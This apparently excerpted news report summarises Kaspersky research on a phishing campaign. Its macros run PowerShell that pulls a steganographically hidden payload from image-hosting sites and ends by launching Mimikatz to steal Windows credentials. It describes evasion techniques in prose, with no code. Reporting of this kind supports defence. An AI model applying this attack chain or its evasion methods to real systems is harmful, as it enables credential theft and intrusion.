The attacks begin with emails that are customized for each target, a researcher at security firm Kaspersky Lab reported this week.

Behind the scenes, however, a macro executes a Powershell script.

The PowerShell script reaches out to either imgur.com or imgbox.com and downloads an image that has malicious code hidden inside the pixels through a technique called steganography.

The decrypted and decoded data is used as a second PowerShell script that, in turn, unpacks and decodes another blob of Base64-encoded data.

With that, a third obfuscated PowerShell script executes Mimikatz malware that’s designed to steal Windows account credentials used to access various network resources.

First, the malicious module is encoded in an image using steganographic techniques and the image is hosted on legitimate web resources.

This makes it virtually impossible to detect such malware using network traffic monitoring and control tools while it is being downloaded.

A second curious feature of the malware is the use of the exception message as the decryption key for the malicious payload.

If the attackers are able to harvest the credentials of a contractor organization’s employees, this can lead to a range of negative consequences, from the theft of sensitive data to attacks on industrial enterprises via remote administration tools used by the contractor.